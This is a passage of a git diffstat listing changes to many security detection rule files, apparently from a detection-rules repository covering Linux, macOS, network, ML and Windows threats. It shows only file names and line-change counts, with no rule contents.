...s_ml_windows_rare_region_name_by_user.toml | 19 +-- ...se_evasion_ml_rare_process_for_a_host.toml | 15 +-- ..._ml_rare_process_for_a_parent_process.toml | 15 +-- ...se_evasion_ml_rare_process_for_a_user.toml | 32 +++-- ...icious_windows_event_high_probability.toml | 20 +-- ...picious_windows_event_low_probability.toml | 20 +-- ...ous_windows_process_cluster_from_host.toml | 15 +-- ...s_process_cluster_from_parent_process.toml | 15 +-- ...ous_windows_process_cluster_from_user.toml | 15 +-- ...and_control_aws_cli_endpoint_url_used.toml | 14 +- ...mand_and_control_cat_network_activity.toml | 30 ++--- ...and_control_cupsd_foomatic_rip_netcon.toml | 42 ++---- ...and_control_curl_socks_proxy_detected.toml | 8 +- ..._git_repo_or_file_download_to_sus_dir.toml | 8 +- ...nd_and_control_ip_forwarding_activity.toml | 13 +- ...ntrol_kubectl_networking_modification.toml | 12 +- ...mand_and_control_linux_kworker_netcon.toml | 43 +----- ...nd_control_linux_proxychains_activity.toml | 8 +- ..._and_control_linux_ssh_x11_forwarding.toml | 33 +++-- ...linux_suspicious_proxychains_activity.toml | 8 +- ...l_linux_tunneling_and_port_forwarding.toml | 7 +- ...ontrol_linux_tunneling_via_ssh_option.toml | 7 +- ...trol_potential_tunneling_command_line.toml | 7 +- ...mand_and_control_telegram_api_request.toml | 23 ++-- ...d_and_control_tunneling_via_earthworm.toml | 7 +- ...ial_access_collection_sensitive_files.toml | 37 +++--- ...ve_files_compression_inside_container.toml | 38 +++--- ...ntial_access_gdb_init_process_hooking.toml | 7 +- ...credential_access_gdb_process_hooking.toml | 36 +++-- .../credential_access_gh_auth_via_nodejs.toml | 32 +---- ...ernetes_service_account_secret_access.toml | 40 ++---- ...edential_access_manual_memory_dumping.toml | 7 +- ...tential_linux_ssh_bruteforce_external.toml | 7 +- ...tential_linux_ssh_bruteforce_internal.toml | 7 +- ...ss_potential_password_spraying_attack.toml | 7 +- ...ntial_successful_linux_ssh_bruteforce.toml | 7 +- ...ential_access_proc_credential_dumping.toml | 7 +- ..._or_passwords_search_inside_container.toml | 24 ++-- ...cess_ssh_password_grabbing_via_strace.toml | 31 +---- ...nse_evasion_apparmor_policy_violation.toml | 7 +- ...ion_attempt_to_disable_auditd_service.toml | 8 +- ...tempt_to_disable_iptables_or_firewall.toml | 8 +- ...ion_attempt_to_disable_syslog_service.toml | 7 +- ...evasion_authorized_keys_file_deletion.toml | 28 ++-- ...ense_evasion_base64_decoding_activity.toml | 35 +---- ...binary_copied_to_suspicious_directory.toml | 7 +- ...defense_evasion_bpf_program_tampering.toml | 7 +- ...ense_evasion_clear_kernel_ring_buffer.toml | 12 +- ...sion_curl_or_wget_executed_via_lolbin.toml | 67 +++------- ...nse_evasion_directory_creation_in_bin.toml | 23 +--- ...fense_evasion_disable_selinux_attempt.toml | 7 +- ...doas_configuration_creation_or_rename.toml | 31 +++-- ...defense_evasion_file_mod_writable_dir.toml | 8 +- ...hex_payload_execution_via_commandline.toml | 52 +------- ...ion_hex_payload_execution_via_utility.toml | 22 +--- ...nse_evasion_hidden_directory_creation.toml | 22 +--- .../defense_evasion_hidden_file_dir_tmp.toml | 10 +- ...on_interactive_shell_from_system_user.toml | 32 ++--- ...rpreter_launched_from_decoded_payload.toml | 59 ++++----- ...defense_evasion_journalctl_clear_logs.toml | 12 +- ...defense_evasion_kernel_module_removal.toml | 20 +-- ...defense_evasion_kill_command_executed.toml | 45 ++----- ...defense_evasion_kthreadd_masquerading.toml | 13 +- .../defense_evasion_ld_preload_cmdline.toml | 74 ++--------- .../linux/defense_evasion_ld_so_creation.toml | 46 +------ ...evasion_multi_base64_decoding_attempt.toml | 61 ++------- ...asion_potential_kubectl_impersonation.toml | 40 ++---- ...vasion_potential_kubectl_masquerading.toml | 7 +- ...ense_evasion_potential_proot_exploits.toml | 33 ++--- ..._evasion_prctl_process_name_tampering.toml | 8 +- .../defense_evasion_rename_esxi_files.toml | 34 +++-- ...ense_evasion_ssl_certificate_deletion.toml | 12 +- ...s_utility_executed_via_tmux_or_screen.toml | 8 +- ...fense_evasion_suspicious_path_mounted.toml | 7 +- ...vasion_symlink_binary_to_writable_dir.toml | 32 ++--- ...vasion_sysctl_kernel_feature_activity.toml | 22 +--- ...ense_evasion_unusual_preload_env_vars.toml | 31 +---- ...efense_evasion_user_or_group_deletion.toml | 22 ++-- ...r_log_file_creation_by_unsual_process.toml | 47 +------ .../discovery_dynamic_linker_via_od.toml | 8 +- .../discovery_esxi_software_via_find.toml | 7 +- .../discovery_esxi_software_via_grep.toml | 8 +- ...ion_discovery_via_kprobes_and_tracefs.toml | 35 +---- .../discovery_kernel_module_enumeration.toml | 9 +- rules/linux/discovery_kernel_seeking.toml | 30 +---- rules/linux/discovery_kernel_unpacking.toml | 30 +---- .../discovery_kubeconfig_file_discovery.toml | 38 +++--- ...iscovery_kubectl_permission_discovery.toml | 8 +- .../linux/discovery_linux_hping_activity.toml | 11 +- .../linux/discovery_linux_nping_activity.toml | 10 +- ..._mount_discovery_via_exports_or_fstab.toml | 8 +- .../discovery_pam_version_discovery.toml | 48 +------ .../linux/discovery_ping_sweep_detected.toml | 8 +- .../discovery_polkit_version_discovery.toml | 8 +- ...ivate_key_password_searching_activity.toml | 29 ++-- rules/linux/discovery_proc_maps_read.toml | 34 +---- .../linux/discovery_process_capabilities.toml | 8 +- ...curity_file_access_via_common_utility.toml | 37 ++++-- ...very_sudo_allowed_command_enumeration.toml | 11 +- .../discovery_suid_sguid_enumeration.toml | 38 +----- ...etwork_tool_launched_inside_container.toml | 50 ++----- ...ry_suspicious_which_command_execution.toml | 11 +- ...overy_unusual_user_enumeration_via_id.toml | 23 +++- ...covery_virtual_machine_fingerprinting.toml | 43 +++--- .../discovery_yum_dnf_plugin_detection.toml | 13 +- ...tion_abnormal_process_id_file_created.toml | 31 ++--- ...tion_cupsd_foomatic_rip_file_creation.toml | 12 +- ..._cupsd_foomatic_rip_lp_user_execution.toml | 40 +++--- ...on_cupsd_foomatic_rip_shell_execution.toml | 14 +- ...omatic_rip_suspicious_child_execution.toml | 40 +++--- ...nnection_from_entrypoint_in_container.toml | 38 +++--- .../execution_executable_stack_execution.toml | 19 +-- ...n_file_execution_followed_by_deletion.toml | 42 ++++-- ...executable_via_chmod_inside_container.toml | 25 +--- ...er_or_listener_established_via_netcat.toml | 46 +++++-- .../execution_kubectl_apply_pod_from_url.toml | 12 +- ...s_direct_api_request_via_curl_or_wget.toml | 37 ++---- .../execution_nc_listener_via_rlwrap.toml | 31 ++--- ...ion_netcon_from_rwx_mem_region_binary.toml | 41 ++---- ...cution_network_event_post_compilation.toml | 45 +++---- rules/linux/execution_perl_tty_shell.toml | 7 +- ...xecution_potential_hack_tool_executed.toml | 99 +++++++++++--- ..._overly_permissive_container_creation.toml | 25 +--- ...rocess_backgrounded_by_unusual_parent.toml | 50 ++++--- ..._process_started_from_process_id_file.toml | 33 ++--- ...ss_started_in_shared_memory_directory.toml | 32 +++-- rules/linux/execution_python_tty_shell.toml | 7 +- .../execution_python_webserver_spawned.toml | 15 +-- .../execution_shell_evasion_linux_binary.toml | 30 +++-- ...cution_shell_openssl_client_or_server.toml | 38 ++---- ...xecution_shell_via_background_process.toml | 40 +++--- ...ion_shell_via_child_tcp_utility_linux.toml | 37 +++--- ...ecution_shell_via_java_revshell_linux.toml | 15 +-- ...on_shell_via_lolbin_interpreter_linux.toml | 47 +++---- ...execution_shell_via_meterpreter_linux.toml | 50 +++---- ...execution_shell_via_suspicious_binary.toml | 37 +++--- ...ution_shell_via_tcp_cli_utility_linux.toml | 37 +++--- ...ution_shell_via_udp_cli_utility_linux.toml | 37 +++--- ...traction_or_decrompression_via_funzip.toml | 37 +----- ...us_executable_running_system_commands.toml | 53 +++++--- ...icious_mining_process_creation_events.toml | 45 ++++--- ...execution_suspicious_mkfifo_execution.toml | 37 ++---- ..._container_creation_command_execution.toml | 32 +---- ..._system_binary_file_permission_change.toml | 28 ++-- rules/linux/execution_tc_bpf_filter.toml | 34 ++--- ...nknown_rwx_mem_region_binary_executed.toml | 14 +- .../execution_unusual_kthreadd_execution.toml | 48 +++---- ...ual_path_invocation_from_command_line.toml | 38 ++---- .../execution_unusual_pkexec_execution.toml | 40 ++---- ...tion_potential_curl_data_exfiltration.toml | 23 ++-- ...ntial_data_splitting_for_exfiltration.toml | 7 +- ...filtration_potential_database_dumping.toml | 29 ++-- ...tion_potential_wget_data_exfiltration.toml | 18 +-- ...nusual_file_transfer_utility_launched.toml | 25 +--- .../impact_memory_swap_modification.toml | 33 +---- ...otential_bruteforce_malware_infection.toml | 56 ++------ ..._first_time_public_key_authentication.toml | 34 +++-- ...sful_ssh_authentication_by_unusual_ip.toml | 34 +++-- ...ul_ssh_authentication_by_unusual_user.toml | 34 +++-- ...ess_telnet_auth_bypass_via_user_envar.toml | 31 +---- ...ral_movement_kubeconfig_file_activity.toml | 57 ++------ ...lateral_movement_ssh_it_worm_download.toml | 42 ++---- ...ment_telnet_network_activity_external.toml | 24 ++-- ...istence_apt_package_manager_execution.toml | 59 +++------ ...nce_apt_package_manager_file_creation.toml | 30 +---- ...ersistence_apt_package_manager_netcon.toml | 53 +++----- rules/linux/persistence_at_job_creation.toml | 20 +-- rules/linux/persistence_boot_file_copy.toml | 53 ++------ .../persistence_bpf_probe_write_user.toml | 28 +--- .../persistence_bpf_program_or_map_load.toml | 35 +---- .../persistence_chkconfig_service_add.toml | 7 +- ...credential_access_modify_ssh_binaries.toml | 54 ++------ .../linux/persistence_cron_job_creation.toml | 43 ++---- .../persistence_dbus_service_creation.toml | 14 +- ...e_dbus_unsual_daemon_parent_execution.toml | 52 +------- ..._package_manager_plugin_file_creation.toml | 37 +----- ...kage_installation_from_unusual_parent.toml | 40 ++---- .../persistence_dpkg_unusual_execution.toml | 39 ++---- .../persistence_dracut_module_creation.toml | 51 +------ .../persistence_dynamic_linker_backup.toml | 31 +++-- ...ersistence_extract_initramfs_via_cpio.toml | 12 +- .../linux/persistence_git_hook_execution.toml | 44 ++----- .../persistence_git_hook_file_creation.toml | 52 +------- rules/linux/persistence_git_hook_netcon.toml | 41 +++--- ...ersistence_git_hook_process_execution.toml | 45 ++----- ...rsistence_grub_configuration_creation.toml | 25 +--- rules/linux/persistence_grub_makeconfig.toml | 12 +- .../persistence_init_d_file_creation.toml | 7 +- ...persistence_insmod_kernel_module_load.toml | 28 ++-- ...ersistence_kde_autostart_modification.toml | 7 +- .../linux/persistence_kernel_driver_load.toml | 32 ++--- ...stence_kernel_driver_load_by_non_root.toml | 28 ++-- ...nel_module_load_from_unusual_location.toml | 28 ++-- ...rsistence_kernel_object_file_creation.toml | 30 ++--- ...ce_kubernetes_sensitive_file_activity.toml | 12 +- .../persistence_kworker_file_creation.toml | 38 ++---- ...sistence_linux_backdoor_user_creation.toml | 39 +++--- .../persistence_linux_group_creation.toml | 40 ++++-- ...e_linux_shell_activity_via_web_server.toml | 28 ++-- ..._linux_user_added_to_privileged_group.toml | 45 ++++--- ...tence_lkm_configuration_file_creation.toml | 25 +--- .../persistence_manual_dracut_execution.toml | 33 +---- ...rsistence_message_of_the_day_creation.toml | 7 +- ...sistence_message_of_the_day_execution.toml | 7 +- ...etwork_manager_dispatcher_persistence.toml | 52 +------- ...stence_openssl_passwd_hash_generation.toml | 7 +- ...ggable_authentication_module_creation.toml | 30 +++-- ...cation_module_creation_in_unusual_dir.toml | 30 +++-- ...ication_module_pam_exec_backdoor_exec.toml | 36 ++--- ...authentication_module_source_download.toml | 39 ++---- .../persistence_polkit_policy_creation.toml | 33 +---- ...persistence_script_executable_bit_set.toml | 12 +- ...nce_process_capability_set_via_setcap.toml | 25 +--- .../linux/persistence_pth_file_creation.toml | 44 +------ ...kage_installation_from_unusual_parent.toml | 32 +---- ...sistence_setuid_setgid_capability_set.toml | 22 +--- .../persistence_shared_object_creation.toml | 47 +++++-- ...simple_web_server_connection_accepted.toml | 71 ++++------ ...ersistence_simple_web_server_creation.toml | 52 +------- ...site_and_user_customize_file_creation.toml | 44 +------ .../linux/persistence_ssh_key_generation.toml | 47 +------ rules/linux/persistence_ssh_netcon.toml | 38 +----- ...stence_ssh_via_backdoored_system_user.toml | 51 +++---- ...suspicious_file_opened_through_editor.toml | 68 +++++++++- ...e_suspicious_ssh_execution_xzbackdoor.toml | 51 ++----- ...ersistence_systemd_generator_creation.toml | 41 +----- rules/linux/persistence_systemd_netcon.toml | 65 ++++----- .../persistence_systemd_service_started.toml | 37 ++---- .../persistence_systemd_shell_execution.toml | 36 ++--- ...ersistence_tainted_kernel_module_load.toml | 28 ++-- ...ainted_kernel_module_out_of_tree_load.toml | 24 +--- .../linux/persistence_udev_rule_creation.toml | 12 +- ...ce_unpack_initramfs_via_unmkinitramfs.toml | 38 +----- ...rsistence_unusual_exim4_child_process.toml | 38 +++--- .../persistence_unusual_pam_grantor.toml | 41 +++--- ...ersistence_unusual_sshd_child_process.toml | 52 ++------ ...ser_or_group_creation_or_modification.toml | 12 +- ...sistence_web_server_sus_child_spawned.toml | 48 ++----- ...ence_web_server_sus_command_execution.toml | 44 +------ ...tence_web_server_sus_destination_port.toml | 57 +------- ..._web_server_unusual_command_execution.toml | 48 ++----- ..._package_manager_plugin_file_creation.toml | 35 +---- ...on_chown_chmod_unauthorized_file_read.toml | 47 ++----- ...cve_2025_32463_nsswitch_file_creation.toml | 7 +- ..._cve_2025_32463_sudo_chroot_execution.toml | 12 +- .../privilege_escalation_dac_permissions.toml | 46 +++++-- ...calation_enlightenment_window_manager.toml | 13 +- ...e_escalation_gdb_sys_ptrace_elevation.toml | 12 +- ...lege_escalation_gdb_sys_ptrace_netcon.toml | 52 +------- ...lege_escalation_kworker_uid_elevation.toml | 40 +++--- ...lation_ld_preload_shared_object_modif.toml | 31 +++-- ...lation_linux_suspicious_symbolic_link.toml | 41 ++---- ...n_load_and_unload_of_kernel_via_kexec.toml | 53 +------- ...vilege_escalation_pkexec_envar_hijack.toml | 26 ++-- ...ation_potential_bufferoverflow_attack.toml | 26 ++-- ...tion_potential_suid_sgid_exploitation.toml | 25 +--- ...n_potential_suid_sgid_proxy_execution.toml | 39 +----- ...lation_potential_wildcard_shell_spawn.toml | 32 +---- ...ge_escalation_sda_disk_mount_non_root.toml | 28 ++-- ...privilege_escalation_shadow_file_read.toml | 26 +--- ...vilege_escalation_sudo_cve_2019_14287.toml | 13 +- .../privilege_escalation_sudo_hijacking.toml | 28 ++-- ...uspicious_cap_setuid_python_execution.toml | 7 +- ...ion_suspicious_chown_fowner_elevation.toml | 37 ++++-- ...calation_suspicious_passwd_file_write.toml | 37 ++++-- ...alation_suspicious_uid_guid_elevation.toml | 7 +- ...uid_elevation_from_unknown_executable.toml | 38 ++---- ...lation_unshare_namespace_manipulation.toml | 8 +- ...ery_output_written_to_suspicious_file.toml | 54 ++++---- ...e_file_access_followed_by_compression.toml | 48 +++---- ..._control_aws_s3_connection_via_script.toml | 51 ++++--- ..._control_executable_download_via_wget.toml | 36 ++--- ...control_google_calendar_c2_via_script.toml | 59 ++------- ...rol_network_connection_to_oast_domain.toml | 43 +++--- ...trol_perl_outbound_network_connection.toml | 46 ++----- ..._and_control_potential_etherhiding_c2.toml | 64 ++------- ..._suspicious_curl_to_google_app_script.toml | 34 ++--- ...ection_to_suspicious_top_level_domain.toml | 8 +- ..._connection_to_suspicious_web_service.toml | 8 +- ...dential_access_high_volume_of_pbpaste.toml | 27 ++-- .../credential_access_kerberosdump_kcc.toml | 16 +-- ...s_keychain_pwd_retrieval_security_cmd.toml | 17 +-- ...ential_access_mitm_localhost_webproxy.toml | 11 +- ...al_access_promt_for_pwd_via_osascript.toml | 32 +++-- ...ensitive_file_access_first_occurrence.toml | 25 +++- ...vasion_apple_softupdates_modification.toml | 10 +- ...evasion_attempt_del_quarantine_attrib.toml | 19 ++- ...evasion_attempt_to_disable_gatekeeper.toml | 8 +- ...ion_gatekeeper_override_and_execution.toml | 36 ++--- ..._evasion_modify_environment_launchctl.toml | 30 ++--- ...cy_controls_tcc_database_modification.toml | 44 ++++--- ...tion_privacy_pref_sshd_fulldiskaccess.toml | 39 +++--- .../defense_evasion_safari_config_change.toml | 16 +-- ...dboxed_office_app_suspicious_zip_file.toml | 11 +- ...evasion_suspicious_tcc_access_granted.toml | 70 +++++----- ..._evasion_unload_endpointsecurity_kext.toml | 24 +--- .../discovery_full_disk_access_check.toml | 36 ++--- .../macos/discovery_suspicious_sip_check.toml | 48 ++++--- ...ystem_and_network_configuration_check.toml | 23 ++-- ...covery_users_domain_built_in_commands.toml | 15 ++- ...vasion_electron_app_childproc_node_js.toml | 30 +---- ...l_access_suspicious_browser_childproc.toml | 13 +- ...staller_package_spawned_network_event.toml | 46 +++---- ...n_python_shell_spawn_first_occurrence.toml | 10 +- ...cution_script_via_automator_workflows.toml | 8 +- ...ing_osascript_exec_followed_by_netcon.toml | 32 ++--- ...n_shell_execution_via_apple_scripting.toml | 18 ++- ...ution_unusual_library_load_via_python.toml | 23 ++-- ...uspicious_mac_ms_office_child_process.toml | 55 +++++--- ...ential_access_kerberos_bifrostconsole.toml | 38 +++--- ...ral_movement_remote_ssh_login_enabled.toml | 31 ++--- ...ment_suspicious_curl_to_jamf_endpoint.toml | 41 ++---- ...teral_movement_vpn_connection_attempt.toml | 26 ++-- ...stence_account_creation_hide_at_logon.toml | 39 +++--- ...sistence_apple_mail_rule_modification.toml | 31 ++--- ...ce_creation_change_launch_agents_file.toml | 13 +- ..._creation_hidden_login_item_osascript.toml | 47 +------ ..._access_authorization_plugin_creation.toml | 34 ++--- ...ence_curl_execution_via_shell_profile.toml | 44 +++---- ...launch_agent_deamon_logonitem_process.toml | 43 +++--- ...e_docker_shortcuts_plist_modification.toml | 14 +- .../persistence_enable_root_account.toml | 36 ++--- ...n_hidden_launch_agent_deamon_creation.toml | 38 +++--- ...sistence_finder_sync_plugin_pluginkit.toml | 11 +- ...istence_folder_action_scripts_runtime.toml | 33 +---- .../persistence_hidden_plist_filename.toml | 69 +++++----- ...rsistence_login_logout_hooks_defaults.toml | 8 +- ...stence_loginwindow_plist_modification.toml | 26 ++-- ...nce_manual_chromium_extension_loading.toml | 44 ++----- ...ersistence_periodic_tasks_file_mdofiy.toml | 10 +- ...t_or_daemon_creation_first_occurrence.toml | 10 +- ...e_screensaver_plist_file_modification.toml | 8 +- ...rsistence_startup_item_plist_creation.toml | 53 +++++--- ...tence_via_atom_init_file_modification.toml | 11 +- ...calation_applescript_with_admin_privs.toml | 34 +++-- ...calation_explicit_creds_via_scripting.toml | 33 ++--- ..._escalation_local_user_added_to_admin.toml | 42 +++--- ...ilege_escalation_root_crontab_filemod.toml | 30 +++-- ..._escalation_user_added_to_admin_group.toml | 42 +++--- ...d_control_ml_packetbeat_dns_tunneling.toml | 15 ++- ...d_and_control_ml_packetbeat_rare_urls.toml | 44 +++++-- ...control_ml_packetbeat_rare_user_agent.toml | 26 ++-- ..._access_ml_auth_spike_in_logon_events.toml | 8 +- ...pike_in_logon_events_from_a_source_ip.toml | 37 ++---- ...execution_ml_windows_anomalous_script.toml | 35 +++-- ...nitial_access_ml_auth_rare_user_logon.toml | 35 +++-- ...windows_rare_user_type10_remote_login.toml | 31 +++-- .../ml_high_count_events_for_a_host_name.toml | 58 +------- rules/ml/ml_high_count_network_denies.toml | 66 +++------- rules/ml/ml_high_count_network_events.toml | 54 +------- .../ml_linux_anomalous_network_activity.toml | 60 +-------- ...linux_anomalous_network_port_activity.toml | 44 +------ .../ml_low_count_events_for_a_host_name.toml | 27 +--- .../ml/ml_packetbeat_rare_server_domain.toml | 58 ++------ rules/ml/ml_rare_destination_country.toml | 60 ++------- .../ml/ml_spike_in_traffic_to_a_country.toml | 48 +++---- ...ml_windows_anomalous_network_activity.toml | 53 ++------ ..._ml_linux_anomalous_process_all_hosts.toml | 20 +-- ...istence_ml_rare_process_by_host_linux.toml | 30 +++-- ...tence_ml_rare_process_by_host_windows.toml | 20 +-- ...ce_ml_windows_anomalous_path_activity.toml | 33 +---- ...l_windows_anomalous_process_all_hosts.toml | 32 +---- ...ml_windows_anomalous_process_creation.toml | 35 ++--- ...tion_ml_linux_anomalous_sudo_activity.toml | 18 +-- ...tion_ml_windows_rare_user_runas_event.toml | 18 ++- ..._ml_linux_anomalous_compiler_activity.toml | 20 +-- ...cepted_default_telnet_port_connection.toml | 42 ++---- ...mand_and_control_cobalt_strike_beacon.toml | 12 +- ...cobalt_strike_default_teamserver_cert.toml | 13 +- .../command_and_control_fin7_c2_behavior.toml | 12 +- .../command_and_control_halfbaked_beacon.toml | 16 +-- ...d_control_nat_traversal_port_activity.toml | 8 +- .../command_and_control_port_26_activity.toml | 30 +++-- ...te_desktop_protocol_from_the_internet.toml | 30 +---- ...l_network_computing_from_the_internet.toml | 34 ++--- ...ual_network_computing_to_the_internet.toml | 8 +- ...very_potential_network_sweep_detected.toml | 30 +---- ...iscovery_potential_port_scan_detected.toml | 29 +--- ...very_potential_syn_port_scan_detected.toml | 8 +- ...rtigate_sso_login_from_unusual_source.toml | 10 +- ...s_react_server_components_rce_attempt.toml | 28 ++-- ...ccess_react_server_rce_network_alerts.toml | 37 +----- ...mote_procedure_call_from_the_internet.toml | 11 +- ...remote_procedure_call_to_the_internet.toml | 30 +++-- ...file_sharing_activity_to_the_internet.toml | 18 +-- ...al_access_unsecure_elasticsearch_node.toml | 19 ++- ..._access_endgame_cred_dumping_detected.toml | 10 +- .../endgame_ransomware_detected.toml | 16 ++- .../endgame_ransomware_prevented.toml | 16 ++- .../execution_endgame_exploit_detected.toml | 28 +--- .../execution_endgame_exploit_prevented.toml | 11 +- ...on_endgame_cred_manipulation_detected.toml | 18 ++- ...n_endgame_cred_manipulation_prevented.toml | 18 ++- ...ion_endgame_permission_theft_detected.toml | 28 +++- ...on_endgame_permission_theft_prevented.toml | 28 +++- ...on_endgame_process_injection_detected.toml | 18 ++- ...n_endgame_process_injection_prevented.toml | 18 ++- .../threat_intel_indicator_match_email.toml | 17 ++- ...lection_email_outlook_mailbox_via_com.toml | 21 +-- ...ion_email_powershell_exchange_mailbox.toml | 43 +----- .../collection_mailbox_export_winlog.toml | 13 +- .../collection_posh_audio_capture.toml | 24 +--- .../collection_posh_clipboard_capture.toml | 22 +--- rules/windows/collection_posh_keylogger.toml | 44 ++++--- rules/windows/collection_posh_mailbox.toml | 24 +--- .../collection_posh_screen_grabber.toml | 22 +--- .../collection_posh_webcam_video_capture.toml | 19 +-- .../windows/collection_winrar_encryption.toml | 8 +- .../command_and_control_certreq_postdata.toml | 35 +---- ...ommand_and_control_common_webservices.toml | 45 +------ ...control_encrypted_channel_freesslcert.toml | 8 +- .../command_and_control_iexplore_via_com.toml | 45 +++++-- ...command_and_control_outlook_home_page.toml | 27 +--- ...ontrol_port_forwarding_added_registry.toml | 41 ++---- .../command_and_control_rdp_tunnel_plink.toml | 16 +-- .../command_and_control_remcos_rat_iocs.toml | 35 ++--- ...ol_remote_file_copy_desktopimgdownldr.toml | 31 +++-- ...d_control_remote_file_copy_powershell.toml | 12 +- ..._and_control_remote_file_copy_scripts.toml | 13 +- ...d_and_control_screenconnect_childproc.toml | 31 +++-- ...control_sunburst_c2_activity_detected.toml | 24 +--- ...d_control_teamviewer_remote_file_copy.toml | 8 +- ...nd_and_control_tool_transfer_via_curl.toml | 15 ++- .../command_and_control_tunnel_yuze.toml | 8 +- ..._control_velociraptor_shell_execution.toml | 46 ++++--- .../credential_access_adidns_wildcard.toml | 27 ++-- ...ential_access_browsers_unusual_parent.toml | 33 ++--- ...ntial_access_bruteforce_admin_account.toml | 10 +- ...rce_multiple_logon_failure_same_srcip.toml | 10 +- .../credential_access_cmdline_dump_tool.toml | 39 +----- ...ial_access_dcsync_newterm_subjectuser.toml | 36 +---- ...tial_access_dcsync_replication_rights.toml | 36 +---- ...redential_access_dcsync_user_backdoor.toml | 42 +++--- ...ntial_access_disable_kerberos_preauth.toml | 49 +------ .../credential_access_dnsnode_creation.toml | 27 ++-- ...redential_access_dollar_account_relay.toml | 13 +- ..._access_dollar_account_relay_kerberos.toml | 10 +- ...cess_domain_backup_dpapi_private_keys.toml | 12 +- .../credential_access_generic_localdumps.toml | 22 +--- ..._access_iis_connectionstrings_dumping.toml | 14 +- .../credential_access_kerberos_coerce.toml | 16 +-- ...credential_access_kerberos_coerce_dns.toml | 13 +- .../windows/credential_access_kirbi_file.toml | 8 +- .../credential_access_ldap_attributes.toml | 39 +----- ...edential_access_lsass_loaded_susp_dll.toml | 35 ++--- ...edential_access_lsass_openprocess_api.toml | 30 +---- ...tial_access_machine_account_smb_relay.toml | 10 +- ...l_access_mimikatz_memssp_default_logs.toml | 41 +++--- ...ial_access_mimikatz_powershell_module.toml | 10 +- ..._access_mod_wdigest_security_provider.toml | 39 +++--- ...l_access_moving_registry_hive_via_smb.toml | 37 ++---- ...e_network_logon_provider_modification.toml | 20 ++- ...edential_access_posh_invoke_ninjacopy.toml | 47 +++---- ...edential_access_posh_kerb_ticket_dump.toml | 26 +--- .../credential_access_posh_minidump.toml | 22 +--- .../credential_access_posh_relay_tools.toml | 28 ++-- ...credential_access_posh_request_ticket.toml | 25 +--- .../credential_access_posh_veeam_sql.toml | 26 +--- ...cess_relay_ntlm_auth_via_http_spoolss.toml | 44 +------ ...dential_access_remote_sam_secretsdump.toml | 29 +--- ...ntial_access_saved_creds_vault_winlog.toml | 10 +- ...redential_access_saved_creds_vaultcmd.toml | 10 +- ...edelegationprivilege_assigned_to_user.toml | 38 ++---- .../credential_access_shadow_credentials.toml | 39 +++--- ...dential_access_spn_attribute_modified.toml | 33 ++--- ...ccess_suspicious_lsass_access_memdump.toml | 19 +-- ...cious_winreg_access_via_sebackup_priv.toml | 36 +---- ..._symbolic_link_to_shadow_copy_created.toml | 41 +++--- ...ial_access_veeam_backup_dll_imageload.toml | 25 +--- .../credential_access_veeam_commands.toml | 41 +----- .../credential_access_wbadmin_ntds.toml | 22 +--- ...dential_access_web_config_file_access.toml | 35 +++-- ...dential_access_wireless_creds_dumping.toml | 36 +---- ...den_file_attribute_with_via_attribexe.toml | 38 +----- ...efense_evasion_amsi_bypass_powershell.toml | 24 +--- ..._evasion_audit_policy_disabled_winlog.toml | 20 +-- ...sion_clearing_windows_console_history.toml | 40 +----- ...e_evasion_clearing_windows_event_logs.toml | 12 +- ..._signing_policy_modification_registry.toml | 10 +- ...ication_apps_suspicious_child_process.toml | 42 ++---- ...vasion_defender_disabled_via_registry.toml | 12 +- ...ion_defender_exclusion_via_powershell.toml | 29 +--- ...efense_evasion_disabling_windows_logs.toml | 20 +-- ...vasion_dotnet_compiler_parent_process.toml | 40 +----- ...ecution_control_panel_suspicious_args.toml | 23 +--- ...ense_evasion_execution_lolbas_wuauclt.toml | 21 +-- ...ecution_msbuild_started_by_office_app.toml | 30 +---- ...n_execution_msbuild_started_by_script.toml | 45 +------ ...ion_msbuild_started_by_system_process.toml | 30 +---- ...ion_execution_msbuild_started_renamed.toml | 23 +--- ...cution_msbuild_started_unusal_process.toml | 21 +-- ...execution_suspicious_explorer_winword.toml | 25 +--- ...sion_execution_windefend_unusual_path.toml | 36 ++--- ..._evasion_file_creation_mult_extension.toml | 24 +--- ...sion_hide_encoded_executable_registry.toml | 15 +-- ...ense_evasion_iis_httplogging_disabled.toml | 10 +- ...defense_evasion_indirect_exec_conhost.toml | 11 +- .../defense_evasion_injection_msbuild.toml | 18 +-- ...efense_evasion_lolbas_win_cdb_utility.toml | 11 +- ...e_evasion_lsass_ppl_disabled_registry.toml | 9 +- ...querading_as_elastic_endpoint_process.toml | 19 ++- ..._masquerading_business_apps_installer.toml | 37 +----- ...asion_masquerading_communication_apps.toml | 19 +-- ...erading_suspicious_werfault_childproc.toml | 37 +----- ..._evasion_microsoft_defender_tampering.toml | 8 +- ...nse_evasion_modify_ownership_os_files.toml | 25 +--- ...e_evasion_ms_office_suspicious_regmod.toml | 30 ++--- ...efense_evasion_msiexec_remote_payload.toml | 35 +++-- ...etwork_connection_from_windows_binary.toml | 51 +++++-- ...persistence_account_tokenfilterpolicy.toml | 46 ++----- .../defense_evasion_posh_assembly_load.toml | 23 +--- .../defense_evasion_posh_compressed.toml | 19 +-- ...fense_evasion_posh_defender_tampering.toml | 24 +--- .../defense_evasion_posh_encryption.toml | 28 ++-- .../defense_evasion_posh_high_entropy.toml | 28 ++-- .../defense_evasion_posh_obfuscation.toml | 27 ++-- ...nse_evasion_posh_obfuscation_backtick.toml | 27 ++-- ...evasion_posh_obfuscation_backtick_var.toml | 27 ++-- ..._evasion_posh_obfuscation_char_arrays.toml | 27 ++-- ...asion_posh_obfuscation_concat_dynamic.toml | 27 ++-- ...sh_obfuscation_high_number_proportion.toml | 27 ++-- ...fuscation_iex_env_vars_reconstruction.toml | 27 ++-- ...obfuscation_iex_string_reconstruction.toml | 27 ++-- ...asion_posh_obfuscation_index_reversal.toml | 24 ++-- ...sion_posh_obfuscation_reverse_keyword.toml | 27 ++-- ...vasion_posh_obfuscation_string_concat.toml | 27 ++-- ...vasion_posh_obfuscation_string_format.toml | 27 ++-- ...scation_whitespace_special_proportion.toml | 30 +---- ...efense_evasion_posh_process_injection.toml | 25 +--- ..._powershell_windows_firewall_disabled.toml | 40 +----- ...eg_disable_enableglobalqueryblocklist.toml | 24 ++-- ...efense_evasion_regmod_remotemonologue.toml | 52 ++++---- ...efense_evasion_right_to_left_override.toml | 24 +--- rules/windows/defense_evasion_sc_sdset.toml | 24 +--- ...ion_scheduledjobs_at_protocol_enabled.toml | 46 ++----- ..._evasion_sdelete_like_filename_rename.toml | 34 +---- ...ackdoor_service_disabled_via_registry.toml | 39 +----- ..._evasion_suspicious_certutil_commands.toml | 46 ++++--- 